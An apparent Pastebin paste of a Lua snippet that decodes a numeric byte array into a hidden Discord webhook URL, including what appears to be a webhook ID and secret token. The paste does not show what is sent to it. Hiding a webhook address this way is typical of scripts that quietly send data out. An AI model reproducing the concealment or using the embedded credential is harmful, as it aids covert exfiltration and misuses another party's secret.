Advertisement
EpicGamerSander1345

Untitled

Jun 7th, 2025
7
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.65 KB | None | 0 0
  1. local byteList = {
  2. 104,116,116,112,115,58,47,47,100,105,115,99,111,114,100,46,99,111,109,47,97,112,105,47,119,101,98,104,111,111,107,115,47,
  3. 49,51,55,57,54,55,49,51,52,53,50,54,56,50,54,52,57,54,48,47,122,57,115,118,54,121,113,114,119,79,114,115,114,81,86,116,
  4. 118,103,106,118,117,79,97,95,106,72,54,83,112,102,53,122,45,72,50,101,71,52,81,53,77,111,83,75,70,116,113,122,111,57,
  5. 72,53,105,98,101,56,104,119,79,54,55,120,50,102,85,109,80,75
  6. }
  7.  
  8. local function decodeBytes(bytes)
  9. local str = ""
  10. for i = 1, #bytes do
  11. str = str .. string.char(bytes[i])
  12. end
  13. return str
  14. end
  15.  
  16. local WEBHOOK_URL = decodeBytes(byteList)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement